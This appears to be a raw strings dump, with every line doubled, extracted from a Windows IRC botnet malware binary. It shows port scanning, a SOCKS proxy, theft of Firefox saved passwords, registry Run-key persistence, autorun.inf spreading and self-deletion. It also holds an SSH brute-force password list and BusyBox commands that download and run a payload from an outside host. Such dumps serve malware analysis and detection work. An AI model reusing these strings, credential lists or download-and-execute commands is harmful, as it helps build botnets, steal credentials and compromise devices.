%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Could not parse external IP.
%s Trying to get external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%s Failed to start scan, no IP specified.
%d.x.x.x
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
%stempfile%d%d%d%d%d.exe
Downloading %s and saving it to: %s.
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Socks(4) server started on %s:%i
Starting firefox pstore
Starting firefox pstore
FIREFOX Threads
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
Process Finished: "%s", Total Running Time: %s.
File executed: %s
File executed: %s
Unable to create process: "%s"
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Couldn't open file for writing: %s.
PK11_CheckUserPassword
PK11_CheckUserPassword
PK11_GetInternalKeySlot
PK11_GetInternalKeySlot
softokn3.dll
softokn3.dll
sqlite3.dll
sqlite3.dll
nssutil3.dll
nssutil3.dll
plds4.dll
plds4.dll
nspr4.dll
nspr4.dll
mozcrt19.dll
mozcrt19.dll
nss3.dll
nss3.dll
plc4.dll
plc4.dll
%s %s:%s
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
\profiles.ini
Application Data\Mozilla\Firefox
Application Data\Mozilla\Firefox
signons3.txt
signons3.txt
signons2.txt
signons2.txt
signons1.txt
signons1.txt
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
%s Started send to IP: %s.
200 PORT command successful.
200 PORT command successful.
PORT
PORT
%s %s LIST request from: %s
%s %s LIST request from: %s
425 Passive not supported on this server
425 Passive not supported on this server
215 StnyFtpd
215 StnyFtpd
331 Password required
331 Password required
%s %s
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Ping Timeout? (%d-%d)%d/%d
Login list completed!
Login list completed!
<%i> %s!%s@%s
<%i> %s!%s@%s
Logins:
Logins:
USER blaze * 0 :%s
USER blaze * 0 :%s
NICK %s
NICK %s
{%s-%s-%s-%s-%s}
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
nigzss.txt
TskMultiChatForm.UnicodeClass
TskMultiChatForm.UnicodeClass
__oxFrame.class__
__oxFrame.class__
PASS %s
PASS %s
QUIT %s
QUIT %s
PONG %s
PONG %s
NICK
NICK
PRIVMSG
PRIVMSG
JOIN
JOIN
NOTICE %s :%s
NOTICE %s :%s
PRIVMSG %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
[%s|%s]
[%s|%s]
shlwapi.dll
shlwapi.dll
pstorec.dll
pstorec.dll
psapi.dll
psapi.dll
userenv.dll
userenv.dll
SQLDisconnect
SQLDisconnect
SQLFreeHandle
SQLFreeHandle
SQLAllocHandle
SQLAllocHandle
SQLExecDirect
SQLExecDirect
SQLSetEnvAttr
SQLSetEnvAttr
SQLDriverConnect
SQLDriverConnect
odbc32.dll
odbc32.dll
ShellExecuteA
ShellExecuteA
shell32.dll
shell32.dll
mpr.dll
mpr.dll
GetUdpTable
GetUdpTable
GetTcpTable
GetTcpTable
iphlpapi.dll
iphlpapi.dll
dnsapi.dll
dnsapi.dll
netapi32.dll
netapi32.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetCrackUrlA
InternetOpenUrlA
InternetOpenUrlA
FtpPutFileA
FtpPutFileA
FtpGetFileA
FtpGetFileA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
wininet.dll
wininet.dll
ws2_32.dll
ws2_32.dll
RegEnumKeyExA
RegEnumKeyExA
advapi32.dll
advapi32.dll
user32.dll
user32.dll
kernel32.dll
kernel32.dll
%s!%s@%s
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
NICK {%s-%s-%s-%s-%s}
https:/
https:/
http:/
http:/
system32.exe
system32.exe
Windows Data Serivce
Windows Data Serivce
EFTP//
EFTP//
ftpd.exe
ftpd.exe
idk.freprn.com
idk.freprn.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s\%s
No %s thread found.
No %s thread found.
%s thread stopped.
%s thread stopped.
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\Desktop.ini
\autorun.inf
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
icon=%SystemRoot%\system32\SHELL32.dll,4
http://www.whatismyip.com
http://www.whatismyip.com
http://checkip.dyndns.org
http://checkip.dyndns.org
del "%s">nul
del "%s">nul
if exist "%s" goto Repeat
if exist "%s" goto Repeat
ping 0.0.0.0>nul
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s\removeMe%i%i%i%i.bat
%s%%s
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
%d day%s (%0.2d hours & %0.2d mins)
passwd
passwd
01010101
01010101
10101010
10101010
rootwebmaster
rootwebmaster
rootwebadmin
rootwebadmin
ftpuserftpuser
ftpuserftpuser
mysqlmysql
mysqlmysql
pgsqlpgsql
pgsqlpgsql
webweb
webweb
webmasterwebmaster
webmasterwebmaster
ftpserver
ftpserver
webserver
webserver
ftpftp
ftpftp
webadmin
webadmin
webadmin1
webadmin1
webmaster
webmaster
0987654321
0987654321
1234567890
1234567890
monkey1
monkey1
PaSsWoRd
PaSsWoRd
69696969
69696969
mypass
mypass
12341234
12341234
7654321
7654321
87654321
87654321
monkey
monkey
password1
password1
newpass
newpass
systempass
systempass
%s %s: SSH USELESS: root@%s %s .
%s %s: SSH USELESS: root@%s %s .
%s %s: SSH WIN: root@%s %s .
%s %s: SSH WIN: root@%s %s .
password
password
%s %s: SSH LOL: root:%s@%s .
%s %s: SSH LOL: root:%s@%s .
BusyBox Instructed: %s.
BusyBox Instructed: %s.
./1.jpg
./1.jpg
chmod x 1.jpg
chmod x 1.jpg
test ! -e 1.jpg && busybox wget http://www.freprn.com/1.jpg
test ! -e 1.jpg && busybox wget http://www.freprn.com/1.jpg
wget http://www.freprn.com/1.jpg
wget http://www.freprn.com/1.jpg
BusyBox Fail@ShellOpen: %s.
BusyBox Fail@ShellOpen: %s.
BusyBox Fail@PtyOpen: %s.
BusyBox Fail@PtyOpen: %s.
BusyBox Fail@ChannelOpen: %s.
BusyBox Fail@ChannelOpen: %s.
Setting local Banner: %s
Setting local Banner: %s
Setting Callback %d
Setting Callback %d
Unable to ask for ssh-userauth service
Unable to ask for ssh-userauth service
Would block asking for ssh-userauth service
Would block asking for ssh-userauth service
ssh-userauth
ssh-userauth
Unable to exchange encryption keys
Unable to exchange encryption keys
Would block exchanging encryption keys
Would block exchanging encryption keys
session_startup for socket %d
session_startup for socket %d
Received Banner: %s
Received Banner: %s
SSH-2.0-libssh2_1.0
SSH-2.0-libssh2_1.0
Disconnecting: reason=%d, desc=%s, lang=%s
Disconnecting: reason=%d, desc=%s, lang=%s
Setting blocking mode on session %d
Setting blocking mode on session %d
Invalid descriptor passed to libssh2_poll()
Invalid descriptor passed to libssh2_poll()
Permitted auth methods: %s
Permitted auth methods: %s
ssh-connection
ssh-connection
Unable to send userauth-password-change request
Unable to send userauth-password-change request
Unable to allocate memory for userauth-password-change request
Unable to allocate memory for userauth-password-change request
Password expired, and callback failed
Password expired, and callback failed
Password Expired, and no callback specified
Password Expired, and no callback specified
Password authentication successful
Password authentication successful
Password change required
Password change required
Unable to send userauth-password request
Unable to send userauth-password request
Attempting to login using password authentication
Attempting to login using password authentication
Unable to allocate memory for userauth-password request
Unable to allocate memory for userauth-password request
Invalid signature for supplied public key, or bad username/public key combination
Invalid signature for supplied public key, or bad username/public key combination
Invalid key data, not base64 encoded
Invalid key data, not base64 encoded
Invalid public key data
Invalid public key data
Missing public key data
Missing public key data
Unable to read public key from file
Unable to read public key from file
Unable to allocate memory for public key data
Unable to allocate memory for public key data
Invalid data in public key file
Invalid data in public key file
Unable to open public key file
Unable to open public key file
Loading public key file: %s
Loading public key file: %s
Unable to initialize private key from file
Unable to initialize private key from file
No handler for specified private key
No handler for specified private key
Loading private key file: %s
Loading private key file: %s
Publickey authentication successful
Publickey authentication successful
Attempting publickey authentication -- phase 2
Attempting publickey authentication -- phase 2
Failed allocating additional space for userauth-publickey packet
Failed allocating additional space for userauth-publickey packet
Username/PublicKey combination invalid
Username/PublicKey combination invalid
Pubkey authentication prematurely successful
Pubkey authentication prematurely successful
Unable to send userauth-publickey request
Unable to send userauth-publickey request
Attempting publickey authentication
Attempting publickey authentication
publickey
publickey
Keyboard-interactive authentication successful
Keyboard-interactive authentication successful
Unable to send userauth-keyboard-interactive request
Unable to send userauth-keyboard-interactive request
Unable to allocate memory for keyboard-interactive prompt message
Unable to allocate memory for keyboard-interactive prompt message
Unable to allocate memory for keyboard-interactive response packet
Unable to allocate memory for keyboard-interactive response packet
Keyboard-interactive response callback function invoked
Keyboard-interactive response callback function invoked
Unable to allocate memory for keyboard-interactive responses array
Unable to allocate memory for keyboard-interactive responses array
Unable to allocate memory for keyboard-interactive prompts array
Unable to allocate memory for keyboard-interactive prompts array
Unable to allocate memory for keyboard-interactive 'instruction' request field
Unable to allocate memory for keyboard-interactive 'instruction' request field
Unable to allocate memory for keyboard-interactive 'name' request field
Unable to allocate memory for keyboard-interactive 'name' request field
Unable to send keyboard-interactive request
Unable to send keyboard-interactive request
Attempting keyboard-interactive authentication
Attempting keyboard-interactive authentication
keyboard-interactive
keyboard-interactive
Unable to allocate memory for keyboard-interactive authentication
Unable to allocate memory for keyboard-interactive authentication
Opening Channel - win %d pack %d
Opening Channel - win %d pack %d
direct-tcpip
direct-tcpip
Unable to allocate memory for direct-tcpip connection
Unable to allocate memory for direct-tcpip connection
Requesting direct-tcpip session to from %s:%d to %s:%d
Requesting direct-tcpip session to from %s:%d to %s:%d
Dynamic tcpip-forward port allocated: %d
Dynamic tcpip-forward port allocated: %d
0.0.0.0
0.0.0.0
tcpip-forward
tcpip-forward
Requesting tcpip-forward session for %s:%d
Requesting tcpip-forward session for %s:%d
cancel-tcpip-forward
cancel-tcpip-forward
Cancelling tcpip-forward session for %s:%d
Cancelling tcpip-forward session for %s:%d
Setting remote environment variable: %s=%s on channel %lu/%lu
Setting remote environment variable: %s=%s on channel %lu/%lu
Requesting x11-req for channel %lu/%lu: single=%d proto=%s cookie=%s screen=%d
Requesting x11-req for channel %lu/%lu: single=%d proto=%s cookie=%s screen=%d
starting request(%s) on channel %lu/%lu, message=%s
starting request(%s) on channel %lu/%lu, message=%s
Flushing %d bytes of data from stream %lu on channel %lu/%lu
Flushing %d bytes of data from stream %lu on channel %lu/%lu
Setting channel %lu/%lu handle_extended_data mode to %d
Setting channel %lu/%lu handle_extended_data mode to %d
Reading %d of buffered data from %lu/%lu/%d
Reading %d of buffered data from %lu/%lu/%d
Attempting to read %d bytes from channel %lu/%lu stream #%d
Attempting to read %d bytes from channel %lu/%lu stream #%d
libssh2_packet_write returned EAGAIN
libssh2_packet_write returned EAGAIN
Sending %d bytes on channel %lu/%lu, stream_id=%d
Sending %d bytes on channel %lu/%lu, stream_id=%d
Splitting write block due to %lu byte packet_size on %lu/%lu/%d
Splitting write block due to %lu byte packet_size on %lu/%lu/%d
Splitting write block due to %lu byte window_size on %lu/%lu/%d
Splitting write block due to %lu byte window_size on %lu/%lu/%d
Writing %d bytes on channel %lu/%lu, stream #%d
Writing %d bytes on channel %lu/%lu, stream #%d
libssh2_channel_wait_closed() invoked when channel is not in EOF state
libssh2_channel_wait_closed() invoked when channel is not in EOF state
Renegotiating Keys
Renegotiating Keys
Unable to allocate memory for LIBSSH2_PACKET
Unable to allocate memory for LIBSSH2_PACKET
X11 Connection Received from %s:%ld on channel %lu
X11 Connection Received from %s:%ld on channel %lu
Remote received connection from %s:%ld to %s:%ld
Remote received connection from %s:%ld to %s:%ld
forwarded-tcpip
forwarded-tcpip
Ignoring extended data and refunding %d bytes
Ignoring extended data and refunding %d bytes
Debug Packet: %s
Debug Packet: %s
Disconnect(%d): %s(%s)
Disconnect(%d): %s(%s)
Packet type %d received, length=%d
Packet type %d received, length=%d
Looking for packet of type: %d
Looking for packet of type: %d
May block until packet of type %d becomes available
May block until packet of type %d becomes available
Redirecting into the key re-exchange
Redirecting into the key re-exchange
Initiating Diffie-Hellman Group1 Key Exchange
Initiating Diffie-Hellman Group1 Key Exchange
Server to Client HMAC Key calculated
Server to Client HMAC Key calculated
Client to Server HMAC Key calculated
Client to Server HMAC Key calculated
Server to Client IV and Key calculated
Server to Client IV and Key calculated
Client to Server IV and Key calculated
Client to Server IV and Key calculated
Received NEWKEYS message
Received NEWKEYS message
Timed out waiting for NEWKEYS
Timed out waiting for NEWKEYS
Unable to send NEWKEYS message
Unable to send NEWKEYS message
Sending NEWKEYS message
Sending NEWKEYS message
Unable to verify hostkey signature
Unable to verify hostkey signature
Unable to initialize hostkey importer
Unable to initialize hostkey importer
Unable to allocate memory for a copy of the host key
Unable to allocate memory for a copy of the host key
Burnt packet of type: x
Burnt packet of type: x
Sending KEX packet %d
Sending KEX packet %d
Initiating Diffie-Hellman Group14 Key Exchange
Initiating Diffie-Hellman Group14 Key Exchange
Unrecoverable error exchanging keys
Unrecoverable error exchanging keys
Agreed on COMP_SC method: %s
Agreed on COMP_SC method: %s
Agreed on COMP_CS method: %s
Agreed on COMP_CS method: %s
Agreed on MAC_SC method: %s
Agreed on MAC_SC method: %s
Agreed on MAC_CS method: %s
Agreed on MAC_CS method: %s
Agreed on CRYPT_SC method: %s
Agreed on CRYPT_SC method: %s
Agreed on CRYPT_CS method: %s
Agreed on CRYPT_CS method: %s
Agreed on HOSTKEY method: %s
Agreed on HOSTKEY method: %s
Agreed on KEX method: %s
Agreed on KEX method: %s
The requested method(s) are not currently supported
The requested method(s) are not currently supported
ssh-dss
ssh-dss
ssh-rsa
ssh-rsa
hmac-ripemd160@openssh.com
hmac-ripemd160@openssh.com
rijndael-cbc@lysator.liu.se
rijndael-cbc@lysator.liu.se
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
zcÁ
zcÁ
192.168.11.128
192.168.11.128
%System%.exe
%System%.exe